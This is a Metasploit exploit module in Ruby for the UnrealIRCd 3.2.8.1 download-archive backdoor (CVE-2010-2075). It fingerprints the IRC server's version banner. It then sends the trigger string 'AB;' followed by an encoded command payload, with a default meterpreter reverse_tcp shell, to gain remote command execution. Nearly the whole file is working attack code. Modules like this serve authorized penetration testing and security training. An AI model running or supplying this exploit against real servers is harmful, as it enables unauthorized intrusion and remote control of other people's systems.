##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
        'Description' => %q{
          This module exploits a malicious backdoor that was added to the
          Unreal IRCD 3.2.8.1 download archive. This backdoor was present in the
          Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
        },
        'Author' => [
          'hdm',
          'g0tmi1k'   # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-2075' ],
          [ 'OSVDB', '65445' ],
          [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
        ],
        'Platform' => [ 'unix', 'linux' ],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Linux/Unix Command',
            {
              'Type' => :unix_cmd,
              'DefaultOptions' => {
                'PAYLOAD' => 'cmd/linux/http/x86/meterpreter/reverse_tcp'
              },
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-06-12',
        'DefaultOptions' => {
          'wfsDelay' => 30
        },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(6667)
      ]
    )
  end

  def unreal_version?(response)
    if response =~ /unreal3\.2\.8\.1/i
      report_service(
        host: rhost,
        port: rport,
        proto: 'tcp',
        name: 'irc',
        info: "Unreal 3.2.8.1"
      )
      true
    else
      false
    end
  end

  def send_irc_command(cmd="")
    unless cmd.empty?
      vprint_status("#{cmd}")
      sock.put("#{cmd}\n")
    end
    r = sock.get_once(-1, 10).to_s
    r.split("\n").each do |line|
      vprint_line("    #{line}")
    end
    r
  end

  def check
    vprint_status("Connecting to IRC service")
    connect
    print_status("Connected to #{Rex::Socket.to_authority(rhost, rport)}")

    vprint_status("Checking IRC banner")
    return Exploit::CheckCode::Appears('UnrealIRCd detected in banner') if unreal_version?(send_irc_command)

    irc_user = Faker::Internet.username(specifier: 3..9)
    print_status("Trying to register a new IRC user: #{irc_user}")
    send_irc_command("NICK #{irc_user}")
    # Not checking for PING/PONG
    response = send_irc_command("USER #{irc_user} 0 * #{irc_user}")
    return Exploit::CheckCode::Appears('UnrealIRCd detected after registration') if unreal_version?(response)

    commands = %w[VERSION INFO CREDITS MOTD BOTMOTD HELP LICENSE]
    return Exploit::CheckCode::Appears('UnrealIRCd detected via IRC commands') if
      commands.any? { |cmd| unreal_version?(send_irc_command(cmd)) }

    return Exploit::CheckCode::Safe('UnrealIRCd 3.2.8.1 not detected')
  end

  def exploit
    # Connect to the IRC service
    vprint_status("Connecting to IRC service")
    connect
    print_status("Connected to #{Rex::Socket.to_authority(rhost, rport)}")

    print_status("Sending IRC backdoor command")
    sock.put("AB;" + payload.encoded + "\n")

    # Finished with IRC
    disconnect
  end
end